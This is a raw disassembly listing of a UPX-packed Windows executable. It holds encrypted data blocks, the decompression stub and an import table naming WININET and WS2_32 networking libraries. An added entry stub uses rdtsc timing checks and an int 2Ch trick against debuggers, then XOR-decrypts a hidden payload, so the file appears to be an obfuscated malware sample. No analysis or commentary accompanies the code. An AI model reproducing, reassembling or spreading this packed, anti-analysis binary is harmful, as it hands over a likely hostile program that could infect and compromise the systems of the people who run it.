dd 68306F31h, 632E7404h, 3ADD8DE7h, 6506ED0Ah, 22686345h
dd 0BDACF600h, 9B6C1EB0h, 0DA61736Eh, 5775660Fh, 0BDADF0BCh
dd 6EEBFF09h, 0A82E696Bh, 6E740067h, 446DACEDh, 611F206Ah
dd 616B3A3Ch, 0C650D1A1h, 2DAC6D0Ch, 0B6D62FCDh, 65B9ED6h
dd 2A620E71h, 86B6CE41h, 234DF29h, 0B6630B7Ah, 5D0BD8Dh
dd 6E2E70F4h, 735B6917h, 1D602D27h, 78AB7003h, 8E617A0Fh
dd 6C75D28Dh, 0B47029C4h, 0B42BDE5Bh, 0C2A86BC7h, 0F4F9195h
dd 1336CB13h, 0F0633269h, 6F4EFD2Bh, 2E626A2Ch, 617A9BA9h
dd 1F0BA81Eh, 61DB3090h, 66176362h, 0FF6C2ADFh, 6A696867h
dd 6E6D6C6Bh, 0BB6B71B9h, 79787776h, 0A37FF97Fh, 4241F57Ah
dd 46454443h, 4A494847h, 504F4E4Bh, 9535251h, 54FE51E9h
dd 58575655h, 0EF4F5A59h, 607737E1h, 0E9652F0Bh, 7068702Eh
dd 0DAD7023Fh, 0F3D6DF6h, 6E63733Fh, 0DB0C6406h, 4B6DC806h
dd 3D3B76DBh, 74133F88h, 22E8C11Bh, 73C480B2h, 0C2A50285h
dd 0AF3E4701h, 36391E35h, 9449B76Dh, 570F416Fh, 3546657Dh
dd 0A0418565h, 6846BF0Ah, 1621430Ch, 6535CC81h, 0D2BA14B6h
dd 614E2931h, 316C39C6h, 686B149Ch, 1E41C466h, 861544FCh
dd 63D23535h, 8A1F79FDh, 0CB77BC2Dh, 79708509h, 450B6E38h
dd 6B819834h, 73405162h, 683A05A5h, 76705953h, 0D060FE53h
dd 0ED70AD5Ah, 78E194Dh, 12B5A19Bh, 540F9432h, 0CC160381h
dd 182C3535h, 0D87C4E21h, 746D0B60h, 6C727068h, 9B306E65h
dd 653D6ECh, 6E1A7065h, 0B25CF1A3h, 12477520h, 0C57C6A0Bh
dd 7264332Eh, 3A4CC80Fh, 0D78764DAh, 7319BFA7h, 4B4CDA4Dh
dd 0B5D4E705h, 4D48200Dh, 1C480840h, 0B6213B2Fh, 1D59B3ADh
dd 6BFF5470h, 4DB275FCh, 0EF72D61Ch, 41784F4Dh, 9BD96FFDh
dd 0DE0D3844h, 0E66C5DBCh, 7645396Eh, 8F0A62A8h, 87704D45h
dd 52317895h, 0B0DEB405h, 865CFADh, 48653353h, 84D3420Fh
dd 4CEA2FCDh, 270045CEh, 0C7B5B073h, 272C440Dh, 0CDE16157h
dd 15462DB5h, 4F0F4B53h, 1DC06A62h, 49986C38h, 0EB5497Ah
dd 0FAABADB4h, 630A6492h, 0F67EC61Ah, 0D15A364Dh, 4BDE678Dh
dd 0B0457965h, 10773858h, 5E0F64C3h, 51ED0AC2h, 0DB11400Ah
dd 0C059B166h, 10219330h, 1DEDDA30h, 410C516Bh, 42609E62h
dd 8745A153h, 436EC941h, 22DB3899h, 48777406h, 0FB6E3828h
dd 440A1082h, 0D60E6112h, 619BB63Ah, 0DB796669h, 2B754067h
dd 476F6136h, 6F186C1Bh, 18112C79h, 6F6F6770h, 0D8F5210h
dd 5E3D9FE4h, 41146573h, 69757163h, 1D2B9C72h, 5494D36h
dd 0ED4C3AA0h, 0DE131669h, 1CAB6DE8h, 0D1F0D685h, 72688007h
dd 0C7892F5Fh, 2A6E3C5Ch, 7F1E685Fh, 0FC747319h, 7235CE66h
dd 36060D11h, 0D7AB7970h, 0FC8E3D8h, 985CF073h, 10E27AE5h
dd 0CD634603h, 0CC341730h, 0B965B962h, 0B3198C15h, 2C0A14D8h
dd 80B0AD02h, 5C491Bh, 10B90D70h, 66DB34E1h, 24F44F41h
dd 0CB6187DAh, 11515330h, 0C2D80A9Fh, 418555B6h, 6E0D0E11h
dd 140C4258h, 6E6E1D7Dh, 441C3716h, 2C74532Bh, 36D96567h
dd 73FF5215h, 960D0202h, 1965965h, 17346F39h, 6596590Ch
dd 13040959h, 0A3811610h, 50E14027h, 5F2FB945h, 14412F99h
dd 0F540D087h, 10B01E0h, 0B83B3D82h, 1312BE06h, 0B60B1D88h
dd 25CEC6ACh, 0F5020B31h, 65B99D07h, 1E0C506Fh, 9791034h
dd 60781BCh, 6C2BF08Eh, 8C642037h, 1E017C64h, 2B8F43D8h
dd 23015D2Eh, 6230790h, 4AC42436h, 20BEE004h, 642EC7B7h
dd 0FE4FBE9h, 7E8D282Bh, 1627C2DDh, 2DF804C0h, 15h, 1200B698h
dd 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31005000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31006AF2
; ---------------------------------------------------------------------------
align 8
loc_31006AE8: ; CODE XREF: UPX1:loc_31006AF9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31006AEE: ; CODE XREF: UPX1:31006B86�j
; UPX1:31006B9D�j
add ebx, ebx
jnz short loc_31006AF9
loc_31006AF2: ; CODE XREF: UPX1:31006AE0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006AF9: ; CODE XREF: UPX1:31006AF0�j
jb short loc_31006AE8
mov eax, 1
loc_31006B00: ; CODE XREF: UPX1:31006B0F�j
; UPX1:31006B1A�j
add ebx, ebx
jnz short loc_31006B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B0B: ; CODE XREF: UPX1:31006B02�j
adc eax, eax
add ebx, ebx
jnb short loc_31006B00
jnz short loc_31006B1C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B00
loc_31006B1C: ; CODE XREF: UPX1:31006B11�j
xor ecx, ecx
sub eax, 3
jb short loc_31006B30
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31006BA2
mov ebp, eax
loc_31006B30: ; CODE XREF: UPX1:31006B21�j
add ebx, ebx
jnz short loc_31006B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B3B: ; CODE XREF: UPX1:31006B32�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31006B48
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B48: ; CODE XREF: UPX1:31006B3F�j
adc ecx, ecx
jnz short loc_31006B6C
inc ecx
loc_31006B4D: ; CODE XREF: UPX1:31006B5C�j
; UPX1:31006B67�j
add ebx, ebx
jnz short loc_31006B58
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B58: ; CODE XREF: UPX1:31006B4F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31006B4D
jnz short loc_31006B69
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B4D
loc_31006B69: ; CODE XREF: UPX1:31006B5E�j
add ecx, 2
loc_31006B6C: ; CODE XREF: UPX1:31006B4A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31006B8C
loc_31006B7D: ; CODE XREF: UPX1:31006B84�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31006B7D
jmp loc_31006AEE
; ---------------------------------------------------------------------------
align 4
loc_31006B8C: ; CODE XREF: UPX1:31006B7B�j
; UPX1:31006B99�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31006B8C
add edi, ecx
jmp loc_31006AEE
; ---------------------------------------------------------------------------
loc_31006BA2: ; CODE XREF: UPX1:31006B2C�j
pop esi
mov edi, esi
mov ecx, 82h
loc_31006BAA: ; CODE XREF: UPX1:31006BB1�j
; UPX1:31006BB6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31006BAF: ; CODE XREF: UPX1:31006BD4�j
cmp al, 1
ja short loc_31006BAA
cmp byte ptr [edi], 1
jnz short loc_31006BAA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31006BAF
lea edi, [esi+4000h]
loc_31006BDC: ; CODE XREF: UPX1:31006BFE�j
mov eax, [edi]
or eax, eax
jz short loc_31006C27
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_31006BF9: ; CODE XREF: UPX1:31006C1F�j
mov al, [edi]
inc edi
or al, al
jz short loc_31006BDC
mov ecx, edi
jns short near ptr loc_31006C0A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31006C0A: ; CODE XREF: UPX1:31006C02�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_31006C21
mov [ebx], eax
add ebx, 4
jmp short loc_31006BF9
; ---------------------------------------------------------------------------
loc_31006C21: ; CODE XREF: UPX1:31006C18�j
call dword ptr [esi+6094h]
loc_31006C27: ; CODE XREF: UPX1:31006BE0�j
popa
jmp loc_31001D88
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31007000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 50000387h, 6AD00000h, 0
dd 1E003100h, 680000h, 760h dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
nop
call sub_31009021
loc_31009006: ; CODE XREF: sub_31009021+38�j
pop ebp
retn
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31009008 proc near ; CODE XREF: sub_31009021:loc_31009037�p
; sub_31009021+1D�p
rdtsc
retn
sub_31009008 endp
; =============== S U B R O U T I N E =======================================
sub_3100900B proc near ; CODE XREF: sub_31009021+4A�p
push ebx
mov ecx, 0C99h
mov ebx, edx
loc_31009013: ; CODE XREF: sub_3100900B+10�j
xor [eax], dx
add edx, ebx
lea eax, [eax+2]
loop loc_31009013
pop ebx
locret_3100901E: ; CODE XREF: sub_31009021+E�j
; sub_31009021+10�j ...
retn
sub_3100900B endp
; ---------------------------------------------------------------------------
db 0AEh
db 0A3h
; =============== S U B R O U T I N E =======================================
sub_31009021 proc near ; CODE XREF: start+1�p
test eax, eax
jnz short loc_31009029
int 2Ch ; Internal routine for MSDOS (IRET)
jmp short loc_31009037
; ---------------------------------------------------------------------------
loc_31009029: ; CODE XREF: sub_31009021+2�j
mov dx, cs
shl ebx, 0Ah
js short locret_3100901E
jnb short locret_3100901E
cmp dh, bh
jz short locret_3100901E
loc_31009037: ; CODE XREF: sub_31009021+6�j
call sub_31009008
mov ebx, eax
call sub_31009008
neg ebx
push ebp
add eax, ebx
mov ebp, [esp+4]
sub dword ptr [esp+4], 1E06h
sub eax, 100h
jnb short loc_31009006
sub ebp, 201006h
lea eax, [ebp+201070h]
mov dx, [eax-51h]
call sub_3100900B
inc ebp
mov ds:0E32E1BD7h, eax
cmp [ebp+66h], ebp
retn 29EBh
sub_31009021 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 504BF8A4h, 0E5C4B544h, 0AC380891h, 7875A4D6h, 6E6BAB71h
dd 96B1A696h, 0D1D2AEF0h, 41D41FCDh, 0D9FD47A1h, 0FCAAF882h
dd 936C271Bh, 779768BEh, 8A3F87FBh, 99103091h, 8F5C1241h
dd 488DB45Ch, 9787E071h, 51773590h, 2C00F90Eh, 2E44C596h
dd 0D1EC7897h, 85B9203Dh, 3F2AF4D8h, 79E71005h, 6495A3B4h
dd 0FD6C5197h, 5CC8B917h, 0C5417235h, 9DC522A6h, 73A8E14Bh
dd 0ACC7858Ah, 0E832986Fh, 4186562h, 134CAC9Eh, 0F2DB9C96h
dd 0BB6A5A1Eh, 7560E7DEh, 0E8351CF1h, 0B53838C8h, 0FC705B2Eh
dd 4C102522h, 74D206FAh, 47777E25h, 19C45F9Ch, 0E44F7D17h
dd 0A89C072Fh, 0FAB0E9C9h, 0B4549386h, 5EA597A7h, 638F225Eh
dd 0D487CEAh, 0D102E616h, 9C00EA19h, 4DC9B6CFh, 0A7D8A703h
dd 52214D33h, 345926E2h, 20C5E383h, 0A06B159Ah, 8FA4E81Eh
dd 0D7BDB30Dh, 1F5C5ABBh, 65D2D87Fh, 84E69C99h, 437F50E2h
dd 0B6328A5Eh, 8308CA7Ah, 0DF85A35Fh, 160B6E12h, 4C3D100Dh
dd 5F98FCCAh, 0C7DE46D3h, 30B84AA2h, 767856F1h, 0F9831A5Ah
dd 6240BA2h, 5CC0C1D1h, 1195F86Eh, 0DB581E7Ch, 228A5F4Eh
dd 9530AC82h, 91A64F4Bh, 0F728D03Ah, 4047B412h, 322D74F2h
dd 0CEDC3B4Eh, 9EE19D21h, 0DCB4BA01h, 8500018Fh, 7F9C5BEh
dd 0C0C8B00Bh, 0F8C628D3h, 3E0B3E3Eh, 0C9EF6E44h, 1AAD20D3h
dd 6B94D4FCh, 560CB7E9h, 60B293C9h, 6DC09DE6h, 49041356h
dd 0DD49EF27h, 6478220Eh, 81728EFh, 0D3742D1Fh, 70D01DB5h
dd 662CD67Fh, 0A9E085DAh, 0FE44C36h, 18692207h, 705C5EEEh
dd 0C6FA9FCEh, 5E5400A6h, 51B0B26Ah, 5C0C935Eh, 8E3F4C52h
dd 2AACD817h, 8C20CE72h, 9A55A05Bh, 1D2362Ah, 0DCCBA587h
dd 90B0C554h, 0D7EC31D6h, 1DC3929Ah, 66CEC2F6h, 0C40AE90Bh
dd 0CFC9AEA4h, 0D7B8B920h, 39972397h, 0CB500E18h, 7C48601Eh
dd 0B228B678h, 0A184FDD0h, 0A4A4117Ch, 0A5C38CC2h, 77B8FA18h
dd 0A98EAECBh, 0CF636282h, 67E61473h, 99B9F17Ah, 0DEC2D025h
dd 9E438012h, 6B3CED18h, 88FC01CAh, 72D45624h, 611AD307h
dd 89FC1BDEh, 0E6FDA9B5h, 0AAC573B6h, 5E8093E7h, 0A5FCFDB1h
dd 0EF43CEA5h, 0B13F9106h, 7C30F230h, 4C6D6F41h, 2AE1059Fh
dd 30992F76h, 6680D5FBh, 0EFDC3DD1h, 2839780Dh, 391940E6h
dd 55F03368h, 0FF3DA587h, 6CC72475h, 3085E976h, 0D44019DDh
dd 1BBC87F1h, 62C33865h, 4C9C06C6h, 7CD04E23h, 190659C3h
dd 0EA4757DAh, 383DD236h, 0EEC36FE2h, 55DCD8EDh, 9D92ADB3h
dd 50D959CCh, 2C909C65h, 740CCCE7h, 0F66C9ABAh, 0FD3BA0E8h
dd 4EAD0D14h, 917CED83h, 5573532Ah, 129F78C1h, 0CCF66F06h
dd 7A67F0DCh, 0D62052F0h, 0B6A499A8h, 0E008B9Eh, 0A45C426Ah
dd 1BB8700Ah, 945F70Ch, 5D20F0A8h, 0C9E61C8Bh, 0F5ABD57Ah
dd 26A4BC96h, 6B6B1C32h, 0CBB763E4h, 4EF2AE80h, 0FFA6F02Ch
dd 837051A2h, 24C680FEh, 3CF7A20Bh, 993A9A49h, 0A39F5732h
dd 0C61361EBh, 8978E4F7h, 0C0D498ABh, 908974A2h, 0D48CBBD9h
dd 274DF0D5h, 0CE544A7Bh, 0E0251CF2h, 83FCF95Dh, 0C7CDAD4Ah
dd 59B4481Fh, 79023A9Dh, 8C84F69Eh, 0ADC83E1Ah, 5C4FEA19h
dd 19F29CA2h, 0D2B07D58h, 9E6E3EEDh, 7F1D78Ah, 180FBA42h
dd 0D56C1830h, 351AFD73h, 3054C076h, 540A27D8h, 0D8DEDAF1h
dd 0FA9D964Ah, 174BA899h, 9E862748h, 1146B8F5h, 57995B88h
dd 0FBB7FB36h, 932227D6h, 44EED989h, 1194B83Ch, 0EA547DC1h
dd 2A02F5FDh, 8F87A77Eh, 0C23EB8ECh, 4C3B6140h, 21005738h
dd 3F6C004Dh, 867A99D5h, 0F75E53A6h, 0AB6F9888h, 85CCCBE4h
dd 0CD490123h, 0F58FE7F6h, 824B4DBh, 81C900F9h, 0D9B86720h
dd 88B10D90h, 7970F5E8h, 55334A4Ah, 8084E5Ch, 13F06B53h
dd 921E7074h, 0AAC3D4FCh, 25F289CEh, 0F90BE32Ch, 0B4703ABCh
dd 27D8977Bh, 47DF77C9h, 4357E6B6h, 0E8F0CD83h, 3936CFEBh
dd 0E150C9CAh, 0A7C478E7h, 0BF641B82h, 66DCC388h, 0AF7D2569h
dd 404401BFh, 3D43132h, 5BD8C4B1h, 0B1E27225h, 695C3F26h
dd 79EF799Fh, 58CE5841h, 2023153Ah, 10C98F7h, 0B8D7A3D2h
dd 0AEF549BBh, 74ADCD8Ah, 0F49459CFh, 9B0F3A44h, 0AC4C089Eh
dd 3A9B15FAh, 6A55C607h, 8660DFDAh, 9878AD0Eh, 9A14073Ah
dd 0EB7E602h, 9F848A47h, 18D3A396h, 351D0725h, 27E4F223h
dd 421048C3h, 24B5C67Bh, 6B3C2B4Ah, 931D6265h, 0DAE86F5Ah
dd 220C607Eh, 6968D584h, 0B0C40D17h, 0F8205472h, 3F7C9BCEh
dd 798BB57Bh, 0EE1D8413h, 0B9C9DAE2h, 0A79979BAh, 0F88BEE78h
dd 8ED726B4h, 566DEE1Ch, 103E99CAh, 0B2CC7D6Fh, 6A71363Ah
dd 2219FAB6h, 0FBCC816Ah, 0BC5A4F09h, 4A84F6B7h, 192BE41h
dd 0F63C7FEBh, 88F93D98h, 2F9DE623h, 0C850A6C7h, 0A6CD4B8Ch
dd 7661303Fh, 1105F0D3h, 0CFAE6C62h, 825F4C2Fh, 520CF2AFh
dd 1DBBA976h, 874351E7h, 68FE2ADEh, 68DC55Bh, 0E82B95F3h
dd 91C86B97h, 2A98E62Bh, 133DBCE9h, 0D1E07372h, 65713810h
dd 2D1EE7BEh, 0DBAD987Bh, 0BF485C19h, 2DF016B7h, 4B2911Ch
dd 0C2507AFAh, 8CD15092h, 53A4EC2Bh, 0E72DBAECh, 0BECD61FAh
dd 77680710h, 2B14C1F3h, 0D4C99F67h, 0E859370Fh, 6900EE81h
dd 25B5BF4Bh, 0BE496017h, 43FC049Dh, 1881C55Fh, 94259DFBh
dd 96E852A9h, 4E8D1B25h, 63D80C3h, 0DCD14067h, 0BE0C143Bh
dd 2F25E8DFh, 0E2A89172h, 0AB4E4A3Ah, 163D17A2h, 0EACDF6Dh
dd 0C04072FFh, 9EF90C8Fh, 5C98F35Bh, 7B09AEE8h, 96D07BB1h
dd 4C700B37h, 1F39C1C7h, 0D9DD986Bh, 94717B66h, 571DE696h
dd 6B8AA4Eh, 0D36F123Bh, 8FE10FA2h, 2A8FC841h, 0F859AF8Eh
dd 0A0EA4ABCh, 5F9A182Fh, 2550FFDAh, 0C6FA719Bh, 94653836h
dd 5702FAFFh, 0BA1B160h, 86724C07h, 61142DCAh, 14B8D344h
dd 0FE5F95EEh, 85E30CDEh, 4981C45Eh, 0A36AEE4h, 0DBED16B3h
dd 6495083Eh, 0F3EEADDh, 90D1816Fh, 0B675442Dh, 7A0012F8h
dd 16B8A257h, 0EF43641Fh, 90F01ED2h, 53AEC940h, 0F74B85E9h
dd 0A4E677E6h, 61830A21h, 330A84ADh, 0A1DC8E88h, 8A6B3706h
dd 313FFD7h, 0FD99A3Ch, 0DA4A1B1Eh, 6F3206A7h, 1ED0CF4Eh
dd 0FC6A851Bh, 0A8C95DB6h, 418DF242h, 1825B3E7h, 0D7CF0EAFh
dd 9591103Eh, 283BCDC3h, 0FAD5916Ch, 0A4697F5Eh, 72041AFCh
dd 3BA9D242h, 0C34C5172h, 0B87C39ABh, 44B9FC44h, 0B51B1D0h
dd 0AAD679ADh, 5CEC0252h, 273CDCF3h, 0F5E59997h, 0E163523Eh
dd 5C35F6F9h, 3D18A6Fh, 0C35A1303h, 8B1A3E83h, 379CD66Dh
dd 0E1419F13h, 0A7E157B3h, 7E8B1766h, 1772BFE0h, 0CBFD74A9h
dd 98B22B32h, 7750F0CEh, 0E5DE9F8Ah, 986D503Bh, 6A0704C4h
dd 18C0C061h, 0FB6EB91Ah, 0B51D35ABh, 49B7E654h, 0C75A3F1h
dd 0F8F859DEh, 76893A48h, 2921F5F3h, 0FFCF8486h, 95887B4Eh
dd 490E0CCBh, 1FBB363h, 0DB736E31h, 0F6023DD7h, 4D87EE54h
dd 0F7748F13h, 0BFE54BBDh, 78B3245Dh, 1538D9EFh, 0C7E4B192h
dd 8A95152Ch, 5F23E4EAh, 28DC9AFAh, 0A5707324h, 6E3617D1h
dd 2FC9DF7Ch, 0FB7DBF06h, 0DD0D4BA9h, 5181F56Ch, 3F55BA1Bh
dd 0D6FC7CA3h, 9C8A1E5Bh, 232DECFDh, 0E7F38C9Ah, 878C634Ah
dd 7D201DD4h, 2BC2D554h, 0EA60622Bh, 9C0727DFh, 4196926Fh
dd 144E8C1Eh, 0A1184FADh, 62AA1C79h, 3C60C8E8h, 0F3E398A3h
dd 889E4A6Dh, 7E48E2F4h, 4F78DA5h, 0CD746633h, 933F5BDEh
dd 35DDD065h, 0EB7F8909h
dd 0BA1331B6h, 7FA91770h, 14FC00Eh, 0D8EB6FA2h, 9C992D46h
dd 3A59FBEFh, 0F7FBB898h, 0A6915646h, 7F236CC6h, 23C9D89Dh
dd 0EB66B25Ah, 830A30D3h, 42ACC966h, 1454B41Dh, 0D9147CA4h
dd 77BA2926h, 2E5ED5E7h, 0E6E9A9AAh, 0B7865979h, 44301EF3h
dd 9D49796h, 0E6FC693Ah, 853D27C4h, 71C0FE68h, 0C77E8712h
dd 0B90260BEh, 71A6037Fh, 3954F702h, 0CFF2AABCh, 8495476Fh
dd 5C4AEBFEh, 1CC6A183h, 0A9B67923h, 494C01F2h, 1FE9FDBEh
dd 0B936C01Fh, 0DE2C76F6h, 66DBE75Ch, 86BA606h, 0B40D758Dh
dd 0B4B73D70h, 842FA0Eh, 0F2CD9FBFh, 0B4B62E77h, 7C3524F5h
dd 1CAC59Ch, 0E29D7126h, 0BD540ADEh, 53E3F467h, 126D8C2Ah
dd 0BD2D44CFh, 0E5476957h, 5E89B77h, 9B7CF7A6h, 0C694B2C2h
dd 4034EC85h, 22C09CE7h, 74671054h, 509CD7CAh, 16E4C9A2h
dd 1AFFB800h, 0D67C18C4h, 0E2B4BE89h, 453EB3F3h, 0A4B48BC2h
dd 764107DDh, 3B088203h, 0E8D421E5h, 36EE4C32h, 3116771Bh
dd 2C5831EAh, 0BF9CAC39h, 6C5043FCh, 0A5ACE02Ah, 1E48B896h
dd 0BD7419B6h, 6E926378h, 123CC06Eh, 9312EFCAh, 25846477h
dd 21A2017h, 96D59ADEh, 90C1AFAFh, 8CBBD196h, 6F2D10B9h
dd 65FCC35Bh, 0CECDA7A6h, 16B45216h, 0A243EEB3h, 0EAE98B6Ch
dd 66C86830h, 333D9BF9h, 85D83ED2h, 4457E1D1h, 9184FD8h
dd 49F5236Bh, 0D018F442h, 54B3C461h, 682D47Fh, 1AC44F56h
dd 0DBEF9CB9h, 14BC5917h, 0BBE75F58h, 482B204Dh, 0D2D0C777h
dd 9B71767Eh, 41929F37h, 252D3636h, 0D0603017h, 66C8C2EEh
dd 2FA98B1Bh, 0EF82B759h, 9376A22h, 0F7994E7Ah, 0C168D893h
dd 0B6C444D4h, 2B20879Ah, 9FFD93CEh, 0B9F80C7Bh, 94B9A2ECh
dd 48B0BEFEh, 0AF21BE6Eh, 0D76233BEh, 78A8BE75h, 7C624795h
dd 8D91098Eh, 0EEDCD4CDh, 3C309846h, 402DDFE8h, 0CBA62674h
dd 61D75D85h, 0DC914AD2h, 0C81089F2h, 0E83C4485h, 2CC35B61h
dd 0C379EF16h, 0BE700022h, 4A0DB75h, 0C783A95Ah, 9464F1BEh
dd 10EBC011h, 0D0D7F40Eh, 6F0CA76Ch, 5A21EC61h, 0F6F7D640h
dd 13581789h, 0D3B828B1h, 9D156BFCh, 835F8D98h, 5DDC9024h
dd 2E54C529h, 0CC9D9793h, 0B7C7BB62h, 7CABD054h, 0C2201F70h
dd 0C92731FFh, 7B4438BBh, 1CD9F50Eh, 200B3482h, 0AE8E33A4h
dd 4EDA0FD7h, 3BAEE59Eh, 30238B8h, 86E5D49Fh, 8C6000E7h
dd 52E1300Eh, 3B036587h, 0AAE935C6h, 2AD02608h, 0F1246902h
dd 383110D5h, 9365DC36h, 0C740219Ah, 0F9802BAh, 0C007B24Ah
dd 9D74D058h, 603DBD89h, 2C0D8C7Ah, 73029FBAh, 0BAC413FEh
dd 56720872h, 0DC83F2CEh, 90F8C4D0h, 4FB9FDB5h, 1F907AE6h
dd 6486926Fh, 0C64960CBh, 0B5A451F6h, 0FB956600h, 125CC087h
dd 90CCDE8Fh, 177C3B36h, 0D70B6C3h, 81E84AE1h, 16284578h
dd 10AE2A43h, 0B7658D32h, 0ABDF0DFAh, 6C4CE9BAh, 1AA5F846h
dd 0D3C50EF4h, 85AC18D4h, 0F47D40DFh, 0C9F138E0h, 3FC02F3Bh
dd 0AD4E1239h, 0CC20D9A0h, 88D5E1B1h, 10038782h, 0E4D563B4h
dd 0EB8EB91h, 0F61452C6h, 2335B6A0h, 0B5FCB167h, 7C5AD06Eh
dd 0E7C0DF06h, 9D85986Ah, 16C8E94h, 0B35E63E5h, 23793D56h
dd 160084D6h, 29DDB924h, 0A2749E01h, 0E7775AC6h, 55F037CFh
dd 5C4FE9BEh, 507ACFACh, 0E38C7796h, 6C60BFB2h, 0AABCF78Ah
dd 0C826CE6Ah, 0B93285B3h, 4DFDD1Ch, 0C82C249Fh, 7AA8555Ah
dd 6865F5C7h, 0D90EB3C2h, 2A17639Bh, 63F9CF8Ch, 1E051E8Dh
dd 0E8E64902h, 2982CAA1h, 7131A69Ah, 2E41E1D7h, 30203572h
dd 207C7C7Fh, 3588FAABh, 2A3B5DCFh, 0F6905247h, 91E45CBDh
dd 147ECA6h, 0CCA4286Fh, 0E775506Eh, 54668B02h, 0A2B8738Fh
dd 0CA19EB66h, 0C50ADE2h, 0CA9B23Fh, 0FC84630Fh, 86F816F6h
dd 26C0544Ch, 0E74986FAh, 0AD9B476Bh, 51DBAE7Ch, 93170ECAh
dd 99D00FEh, 0FB08704Ah, 0BD367C41h, 0A9EADC87h, 81DC1E6Eh
dd 0F028249Ah, 5FD4BC2Fh, 0C9476CC6h, 8AED25B2h, 0AB7D6D3Ah
dd 0F844F9BCh, 0F7965432h, 0C379E187h, 2588F80h, 9AB7F76Eh
dd 0B4416FE6h, 8BF97AEEh, 0FDC8ED30h, 983F18E3h, 36B30BD2h
dd 148CF27Ah, 1BC7BBDBh, 0D5B41830h, 0E3D47DC5h, 4465620Bh
dd 2B6BFFFAh, 0D31170DBh, 0F99997B2h, 85988285h, 0C9182582h
dd 0FDF531C6h, 57F0A93Bh, 0B13C46F5h, 530342FAh, 2DC4A42Eh
dd 0F8CB2A91h, 0BCBC36FAh, 8673C5B9h, 4B7489B6h, 0BCBC7A89h
dd 5F0F367Eh, 214853BEh, 0E0ACC79Fh, 4F200C61h, 0D756695Bh
dd 6211702Ah, 0EF4287C2h, 9DCC4C81h, 7D9F0856h, 1124D9F9h
dd 0D1CB9293h, 3933472Bh, 0C40E4125h, 983B84D3h, 0C2547765h
dd 6222333Bh, 18792106h, 2E28D367h, 0DE843AC1h, 0DBAD86BFh
dd 0BC33671h, 0F99C9D41h, 0FBF45846h, 4DD34C4h, 6E9E4DFAh
dd 30A348F6h, 19F1F84Dh, 34C09D3Ch, 574E0204h, 0CF522D5Fh
dd 12A01826h, 66F4598Ah, 4083E15Bh, 0CE8689Fh, 742CB0FCh
dd 0CDA0F7F3h, 77033424h, 2A78ACC4h, 0FAB8908Dh, 2499052Ch
dd 4C72BAh, 69C02993h, 6CA5EB56h, 0D97FC2D2h, 1DB6297Fh
